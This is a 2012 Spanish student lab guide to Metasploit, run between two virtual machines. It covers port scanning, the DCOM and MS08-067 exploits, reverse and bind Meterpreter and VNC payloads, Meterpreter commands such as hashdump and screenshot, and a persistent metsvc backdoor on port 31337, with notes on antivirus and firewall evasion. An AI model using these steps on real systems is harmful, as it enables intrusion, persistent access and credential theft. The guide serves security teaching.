2012

GUIA BSICA METASPLOIT

Javier Garca Cambronel SEGUNDO DE ASIR 17/01/2012

[GUIA BSICA METASPLOIT] 17 de enero de 2012

INTRODUCCION Y PUESTA EN ESCENA

RECOPILACION DE INFORMACIN

METASPLOIT BSICO.

NUESTRO PRIMER ATAQUE EXPLOIT DCOM PUERTO 135

MENCION ESPECIAL A METERPRETER

EXPLOIT MS08_067_NETAPI PUERTO 445

PAYLOAD WINDOWS/METERPRETER/REVERSE_TCP PAYLOAD WINDOWS/METERPRETER/BIND_TCP PAYLOAD WINDOWS/VNCINJECT/BIND_TCP PAYLOAD WINDOWS/VNCINJECT/REVERSE_TCP CON EL ANTERIOR

SEGUNDO DE ASIR

Pgina 1

[GUIA BSICA METASPLOIT] 17 de enero de 2012

INTRODUCCION Y PUESTA EN ESCENA

En este trabajo lo primero que voy a hacer es ponernos en situacin, vamos a tener dos mquinas virtuales, una ser el atacante y otra la vctima.

EQUIPO ATACANTE WINDOWS XP SP3

La direccin IP de nuestro equipo atacante ser la que vemos en la imagen 192.168.1.36

En el instalaremos metasploit, lo descargamos de la pgina principal y bajaremos la versin correspondiente a nuestro sistema operativo http://www.metasploit.com/download/ Una vez descargado, seguimos los pasos de la instalacin por defecto se instalar en C:/METASPLOIT, para qu queremos saber esto? Lo mejor en la instalacin es desactivar nuestro antivirus y una vez terminada aadir esa carpeta a las excepciones del mismo.

SEGUNDO DE ASIR

Pgina 2

[GUIA BSICA METASPLOIT] 17 de enero de 2012 EQUIPO VICTIMA WINDOWS XP SP2

La direccin IP de nuestro equipo atacante ser la que vemos en la imagen 192.168.1.35

En el Equipo vctima tenemos instalado o instalaremos antes de empezar aunque no es estrictamente necesario ni IIS ni SQL SERVER al menos con los exploit que utilizaremos en esta prctica. IIS COMO SERVIDOR WEB SQLSERVER 2005 FIREWALL WINDOWS ANTIVIRUS NOD32 actual a da de hoy 17 de enero de 2012, de hecho segn muchos el mejor antivirus que hay y segn otros uno de los ms potentes con karpersky, Mcafee y BitDefender, G-DATA Para instalar el antivirus seguimos los siguientes pasos, nosotros instalaremos una versin de prueba, lo primero la descargamos y elegimos la versin de nuestro sistema operativo http://www.eset.eu/download/eset-smart-security-trial Una vez descargada seguimos los pasos que vienen a continuacin le damos a siguiente, versin de prueba, insertamos nuestro correo y recibiremos la contrasea por email.

SEGUNDO DE ASIR

Pgina 3

[GUIA BSICA METASPLOIT] 17 de enero de 2012

Aqu vemos que ya tenemos nuestra contrasea, es decir, que la hemos recibido y tan solo la tendramos que introducir y el antivirus queda activado con todas sus caractersticas durante los treinta das siguientes de recibir el e-mail.

SEGUNDO DE ASIR

Pgina 4

[GUIA BSICA METASPLOIT] 17 de enero de 2012

RECOPILACION DE INFORMACIN
Lo primero que vamos a hacer antes de empezar con los ataques va a ser ejecutar el modo grafico para hacer un anlisis de vulnerabilidades y una deteccin del sistema operativo, puertos abiertos

Escribimos la IP de el equipo victima y empezamos el analisis

Podemos ir viendo que el progreso se esta realizando correctamente.

Una vez finalizado el anlisis podemos ver como ha sido detectado el nombre del equipo y el sistema operativo.

SEGUNDO DE ASIR

Pgina 5

[GUIA BSICA METASPLOIT] 17 de enero de 2012

Y como no, tambin todos los puertos abiertos con los correspondientes servicios que estn corriendo en ellos.

SEGUNDO DE ASIR

Pgina 6

[GUIA BSICA METASPLOIT] 17 de enero de 2012

1. CONCEPTOS BASICOS.
Para empezar a hablar del metasploit, lo definiremos como una herramienta GNU escrita en perl y con utilizacin de diversos lenguajes de programacin como C, Python,ASM ,etc, para el desarrollo, testeo, mejora y penetracin a diversos sistemas, entre ellos Windows. Metasploit se ejecuta bajo una consola CYGWIN y trabaja con una base de datos en la cual se encuentran toda la lista de exploits y vulnerabilidades, lo nico que tenemos que indicarle a metasploit es que vulnerabilidad utilizaremos, que sistema atacaremos, que tipo de ataque utilizaremos y datos diversos que utilizara para atacar al host. Se llama Metasploit Framework porque es todo un entorno de testeo para diversas plataformas, la cual trabaja con libreras, bases de datos, y diversos programas, shellcodes, etc. Por tal deja de ser un simple software si no un framework. Metasploit Puede ser descargado de: http://www.metasploit.com/

SEGUNDO DE ASIR

Pgina 7

[GUIA BSICA METASPLOIT] 17 de enero de 2012 2. MODALIDADES

Metasploit trabaja en 2 modalidades las cuales se pueden ejecutar en todas las plataformas y para elegir una es cuestion de gustos y comodidad. Modo Web: (msfweb.bat) Esta modalidad de metasploit es una manera muy comoda de trabajar ya que aqu toda la interface es web y no tienes que escribir mucho, todo lo demas consiste en seleccionar opcion por opcion y al final solo presionar un boton de Exploit para comenzar con el ataque, tambien tiene su modalidad de ataque por Shell el cual lo maneja por secciones, para entrar a este modo, lo unico que se tiene que hacer es abrir el archivo msfweb.bat

Modo Consola: El modo de consola de metasploit aunque es un poco ms engorroso trabajar con l, suele funcionar de una manera ms rpida y a veces mejor, para ejecutarlo, tienes que ejecutar el archivo msfconsole.bat de la carpeta de metasploit. E ir trabajando por medio de comandos en lugar de una interface:

SEGUNDO DE ASIR

Pgina 8

[GUIA BSICA METASPLOIT] 17 de enero de 2012

3. COMIENZOS NUESTRO PRIMER ATAQUE EXPLOIT DCOM PUERTO 135

Empezare a explicar cmo trabajar por medio de consola ya que por medio de la interface web es algo muy intuitivo y personalmente me gusta mas trabajar de este modo. Al abrir la consola del metasploit se presentara una ventana como la de arriba que esperara a que le demos rdenes. El primero comando que utilizaremos, sera show exploits Nos mostrara una gran lista de exploits disponibles, de los cuales tendremos que seleccionar alguno y dependiendo del sistema que deseemos atacar seleccionaremos el adecuado (no voy a ocupar una vulnerabilidad FTP para un servidor shoutcast). Una vez que hallamos encontrado un exploit adecuado, lo seleccionaremos con el comando use [exploit] donde [exploit] es el nombre del exploit que utilizare, supongamos voy a utilizar el exploit DCOM

El comando seria: use msrpc_dcom_ms03_026 Con este comando le diremos a metasploit que utilizaremos el exploit Microsoft RPC DCOM.

SEGUNDO DE ASIR

Pgina 9

[GUIA BSICA METASPLOIT] 17 de enero de 2012

Ahora despus de esto necesitamos seleccionar un sistema vulnerable, para ver los sistemas afectados por metasploit utilizaremos el comando show targets Nos mostrara una pantalla como la siguiente con todos los sistemas operativos vulnerables, en este caso para el DCOM, solamente hay una opcin pero en otros exploits te dar muchas.

Para seleccionar la opcion adecuada utilizaremos el comando SET, el cual su estructura es as: set [Variable] [Valor] Entonces para seleccionar una opcin el comando debera quedar de la siguiente manera set TARGET 0 Aqu por ejemplo le estamos diciendo a metasploit que la variable target es igual a 0 (donde 0 es windows NT SP3) es necesario que las variables de metasploit vaya en MAYUSCULAS ya que si no lo haces as en algunas te dar error. Hasta ahora con lo que hemos hecho lo nico que le hemos ordenado a metasploit es que exploit utilizaremos y que sistema operativo es el que va a atacar, ahora si se dan cuenta falta indicarle que tipo de ataque utilizaremos, para ver los ataques soportados por este exploit utilizaremos el comando show payloads Lo cual nos mostrara una lista como la siguiente:

SEGUNDO DE ASIR

Pgina 10

[GUIA BSICA METASPLOIT] 17 de enero de 2012

No explicare todos los ataques que hay debido a que es un tutorial bsico, explicare los mas comunes. win32_adduser: agregara un usuario(con permisos elevados) al sistema que nos penetremos win32_bind_vncinject: nos mostrara una pantalla del usuario con la cual podemos manejar y controlar su equipo remotamente (un VNC). win32_downloadexec: Descargara un archivo de algun servidor web o ftp y lo ejecutara (entre ellos puede estar troyanos). win32_exec: Ejecutara un comando especificado por ti en la variable CMD. win32_reverse: Mi favorita. Nos dara una shell inversa por si tiene firewall y no podemos abrir puertos. win32_reverse_vncinject:Nos dara un VNC inverso por si tiene firewall y no podemos abrir puertos.

Bien una vez que queramos seleccionar un mtodo de ataque utilizaremos el mismo comando SET [Variable] [Valor] en este caso ser: set PAYLOAD win32_reverse_vncinject Con esto le diremos a metasploit que utilizaremos el meotod win32_reverse_vncinject (recuerda que las variables van en mayusculas). Despus de hacer metasploit necesita mas datos dependiendo del tipo de ataque, exploit o target que utilizaras, para ver opciones te pide utilizaremos el comando show options

SEGUNDO DE ASIR

Pgina 11

[GUIA BSICA METASPLOIT] 17 de enero de 2012

yo recomiendo que solo rellenen las variables que digan required ya que las opcionales son para opciones ms avanzadas, aqu solo nos est pidiendo RHOST (host que atacaremos) y RPORT (puerto por el que se conectara), nos puede pedir ms LHOST y LPORT (para conexiones inversas son el host y el puerto que estar esperando la conexin para dar darle ordenes en este caso tu IP y un puerto disponible de tu maquina), las dems opciones las puedes llenar intuitivamente dependiendo del exploit, ataque y etc que seleccionaste, para ir rellenando casa variable: set [Variable] [Valor] Como comando: set RHOST IPVIctima set RPORT PuertoDeLaVictima En este caso RPORT tiene un valor por defaul como se ve en la imagen (135) este no lo cambien a menos que sea necesario (que la vctima tenga el servicio en otro puerto). Una vez rellenadas todas las variables, solo queda poner el comando: exploit y esperar la respuesta del metasploit, dependiendo del ataque que seleccionaste. Como vemos accedemos remotamente al equipo.

4. ACTUALIZACION Como metasploit utiliza una base de datos donde tiene guardada toda la informacion (targets, exploits, etc) es recomendable actualizara, esto lo pueden hacer ejecutando el archivo msfupdate.bat una vez ejecutado empezara a buscar actualizaciones y si hay te preguntara si quieres descargarlas

SEGUNDO DE ASIR

Pgina 12

[GUIA BSICA METASPLOIT] 17 de enero de 2012

MENCION ESPECIAL A METERPRETER

Meterpreter es un Payload que se ejecuta despus del proceso de explotacin o abuso de una vulnerabilidad en un sistema operativo, meterpreter es el diminutivo para metainterprete y se ejecuta completamente en memoria; evitando as tener problemas con los Antivirus. En este artculo se describen algunas de las caractersticas ms importantes de este shellcode como son: 1. Eliminacin de archivos de Log. 2. Captura de pantalla. 3. Carga y descarga de archivos. 4. Copiar informacin. 5. Extraccin de informacin de configuracin: Tablas de enrutamiento, tarjetas de red, registro de Windows, configuracin de seguridad, archivos compartidos, configuracin de firewall, etc, etc. BACKGROUND Ejecuta la sesin actual en segundo plano para retornar a la lnea de comandos de Meterpreter, para regresar a la sesin se ejecuta el comando tradicional (sessions i 1). MIGRATE Permite migrarse a otro proceso en la maquina vctima. File Systems Commands LS Permite visualizar los archivos en el directorio remoto actual. DOWNLOAD Permite descargar un archivo de la maquina atacada, es necesario hacer uso del back-slash doble en la ruta del mismo. UPLOAD Permite cargar un archivo en una ruta especifica, de la misma manera que el comando download es necesario hacer uso del doble slash al momento de indicar la ruta. SEARCH Permite buscar archivos en la maquina vctima, adems: 1. Permite indicar el tipo de archivo. 2. Permite indicar la ruta donde se quiere realizar la bsqueda. Networking Commads SEGUNDO DE ASIR Pgina 13

[GUIA BSICA METASPLOIT] 17 de enero de 2012

IPCONFIG Permite visualizar todas la informacin de todas tarjetas de red existentes en la maquina atacada ROUTE Permite consultar y modificar la tabla de enrutamiento. System Commads EXECUTE Permite ejecutar un comando. GETPRIVS Permite obtener tantos privilegios de administracin como sea posible. GETUID Permite consultar el tipo de usuario que la maquina victima esta ejecutando. PS Permite consultar todos los procesos que estn en ejecucin. SHELL Permite obtener un Shell, o lnea de comando. SYSINFO Permite obtener informacin del sistema remoto como: 1. Nombre de la maquina. 2. Sistema Operativo. 3. Tipo de arquitectura. 4. Lenguaje del sistema operativo. User Interface Commads ENUMDESKTOPS Permite consultar todas las sesiones (o escritorios). IDLETIME Permite consultar el tiempo en el que el usuario de la maquina victima ha estado ausente.

SEGUNDO DE ASIR

Pgina 14

[GUIA BSICA METASPLOIT] 17 de enero de 2012

SCREENSHOT Permite extraer una imagen del escritorio remoto. UICTL Permite controlar algunos de los componentes del sistema afectado. Password Database Commads HASHDUMP Permite consultar el contenido del la base de datos SAM en sistemas Windows.

SEGUNDO DE ASIR

Pgina 15

[GUIA BSICA METASPLOIT] 17 de enero de 2012

EXPLOIT MS08_067_NETAPI PUERTO 445

Bueno, Ahora vamos a utilizar el exploit ultra conocido ms08_067 el cual va a atacar el puerto 445 lo primero que hacemos ser ingresar el comando use Windows/smb/ms08_067_netapi

PAYLOAD WINDOWS/METERPRETER/REVERSE_TCP
Ahora vamos a utilizar una ataque reverse_tcp el cual nos va a conseguir en principio una sesin meterpreter

Vemos con show options los requerimientos necesarios para la ejecucin de este exploit y si son requeridos.

Entonces ahora lo que hacemos es seleccionar el host local que va a ser el atacante Set lhost 192.168.1.36 Tambien la direccin ip de el equipo al que vamos a atacar Set rhost 192.168.1.35 Y seguidamente lanzamos el exploit escribiendo exploit

SEGUNDO DE ASIR

Pgina 16

[GUIA BSICA METASPLOIT] 17 de enero de 2012

COMPORTAMIENTO DEL EXPLOIT CON FIREWALL DE WINDOWS ACTIVADO

COMPORTAMIENTO DEL EXPLOIT CON FIREWALL Y ANTIVIRUS NOD32 5.0.9.5 Como podemos ver el exploit se ejecuta correctamente y creamos la sesin si ningn problema.

ATAQUE: ENVIANDO UN MENSAJE VIA MS-DOS Una vez creada la sesin abrimos una Shell, con el comando Shell Escribimos el comando netstart mensajero Y despus escribimos el siguiente comando " net send xxx.xxx.x.x mensaje sin las comillas donde estn las equis ser la direccin ip de la victima y evidentemente, donde pone mensaje, el mensaje que estamos mandando. Como podemos ver en la imagen y hemos indicado el firewall y el antivirus estn completamente en funcionamiento.

SEGUNDO DE ASIR

Pgina 17

[GUIA BSICA METASPLOIT] 17 de enero de 2012

COMPORTAMIENTO SIN NINGUN TIPO DE PROTECCION: NI ANTIVIRUS NI FIREWALL Como era de esperar el exploit se lleva a cabo de forma correcta y se crea la sesin.

ATAQUE: REINICIANDO LA MAQUINA DE FORMA REMOTA Ejecutamos el comando Shell para abrir una consola de forma inversa

Y escribimos el comando siguiente en el que indicamos que el equipo atacado se reinicie enviando un mensaje y mostrndolo durante 60 segundos que es el tiempo en el que se va a apagar el sistema

Como podemos ver se nos muestra el mensaje correspondiente que hemos indicado

SEGUNDO DE ASIR

Pgina 18

[GUIA BSICA METASPLOIT] 17 de enero de 2012

PAYLOAD WINDOWS/METERPRETER/BIND_TCP
ATAQUE: PUERTA TRASERA O BACKDOOR set payload windows/meterpreter/bind_tcp

Una vez que hemos escogido el payload, lo primero que miramos con show options es los requisitos de dicho payload y nos cercioramos de que cumplimos todos y configuramos todo debidamente para que funcione la direccin del host local y la del remoto como hemos hecho en el ejemplo anterior si es que estamos en una sesin diferente o hemos empezado a trabajar con esta la primera.

COMPORTAMIENTO DEL EXPLOIT CON FIREWALL DE WINDOWS ACTIVADO Podemos ver que intenta crear la sesin, pero el tiempo de conexin queda excedido y la direccin bloqueada.

COMPORTAMIENTO DEL EXPLOIT CON FIREWALL Y ANTIVIRUS NOD32 5.0.9.5 Vemos que aqu es capaz de detectar el sistema operativo y atacar dicha vulnerabilidad una vez que ha seleccionado la TARGET correctamente, pero no es capaz de iniciar sesin, con lo cual no podemos continuar

SEGUNDO DE ASIR

Pgina 19

[GUIA BSICA METASPLOIT] 17 de enero de 2012

COMPORTAMIENTO SIN NINGUN TIPO DE PROTECCION: NI ANTIVIRUS NI FIREWALL Sin ningn tipo de proteccin es capaz de llevarse a cabo el exploit correctamente y conseguimos iniciar sesin en el sistema operativo de la victima.

Entonces ahora lo que vamos a hacer es crear una puerta trasera o (backdoor) para poder acceder al sistema siempre que queramos. Ejecutamos el comando run metsvc y creamos dicho servicio en el pueto 31337 como se nos indica en la maquina. Una vez completado todo el proceso ya tendramos la puerta trasera funcionando para entrar en el sistema a nuestro antojo.

UNA VEZ QUE TENEMOS UNA PUERTA TRASERA EN EL SISTEMA ABIERTA NI EL FIREWALL DE WINDOWS NI EL ANTIVIRUS Y FIREWAL DE NOD 32 5.0.95 IMPIDEN QUE INICIEMOS SESION Siempre que quisiramos acceder al sistema segaramos los siguientes pasos Ejecutamos el siguiente comando desde la consola de metaspoit use exploit/multi/handler

Introducimos el payload correspondiente set PAYLOAD Windows/metsvc_bind_tcp

SEGUNDO DE ASIR

Pgina 20

[GUIA BSICA METASPLOIT] 17 de enero de 2012

Y volvemos a mirar las opciones pues para acceder al sistema ahora los requisitos han cambiado y como podemos ver requiere de el puerto del proceso.

Entonces se lo indicamos con el comando lport y el nmero del proceso, en este caso seria lport 31337

Si esto fuera una nueva sesin en la que no tuviramos indicada la ip de nuestra victima, lo haramos como en la siguiente imagen.

Y ya solo nos quedara lanzar el exploit y ver como accedemos a una sesin en nuestra vctima.

SEGUNDO DE ASIR

Pgina 21

[GUIA BSICA METASPLOIT] 17 de enero de 2012

ATAQUE: VIGILANCIA MEDIANTE CAPTURAS DE PANTALLA Para ello ejecutaramos el comando screenshot desde meterpreter cuando quisiramos saber que esta viendo en ese momento nuestra vctima, tambin podramos hacer que captura una pantalla cada cierto numero de tiempo automticamente.

Si queremos desinstalar el metsvc en el host remoto para no dejar rastro, tan slo tenemos que ejecutar metsvc -r en nuestra sesin de meterpreter.

SEGUNDO DE ASIR

Pgina 22

[GUIA BSICA METASPLOIT] 17 de enero de 2012

PAYLOAD WINDOWS/VNCINJECT/BIND_TCP
ATAQUE: ESCRITORIO REMOTO

Con show options miramos las opciones que nos son requeridas tanto del exploit como del payload elegido

COMPORTAMIENTO DEL EXPLOIT CON FIREWALL DE WINDOWS ACTIVADO Ejecutamos el payload y vemos que no nos crea la conexin porque el tiempo supera el lmite excedido.

COMPORTAMIENTO DEL EXPLOIT CON FIREWALL Y ANTIVIRUS NOD32 5.0.9.5 Aqu vemos que la sesin de Fingerprinting, se hace correctamente, pero que pese a que el exploit se completa, la sesin no se crea.

SEGUNDO DE ASIR

Pgina 23

[GUIA BSICA METASPLOIT] 17 de enero de 2012

Ahora si que se crea la sesin correctamente sin ningn tipo de problema

Y vemos como podemos acceder de forma remota mediante un VNC al escritorio.

SEGUNDO DE ASIR

Pgina 24

[GUIA BSICA METASPLOIT] 17 de enero de 2012

PAYLOAD WINDOWS/VNCINJECT/REVERSE_TCP CON EL ANTERIOR

ESCRITORIO REMOTO EN REVERSE: DIFERENCIAS (Deja crear sesin con antivirus y firewall de Nod32, antes no) COMPORTAMIENTO DEL EXPLOIT CON FIREWALL DE WINDOWS ACTIVADO Vemos que el limite de sesin queda excedido y no crea sesion.

COMPORTAMIENTO DEL EXPLOIT CON FIREWALL Y ANTIVIRUS NOD32 5.0.9.5 Vemos como se crea perfectamente la sesin

Y accedemos como vemos al escritorio remoto en el que vemos lo que ya sabamos que tanto el FIREWALL como el antivirus estn en activo, y pasaramos a controlar de forma remota el equipo.

SEGUNDO DE ASIR

Pgina 25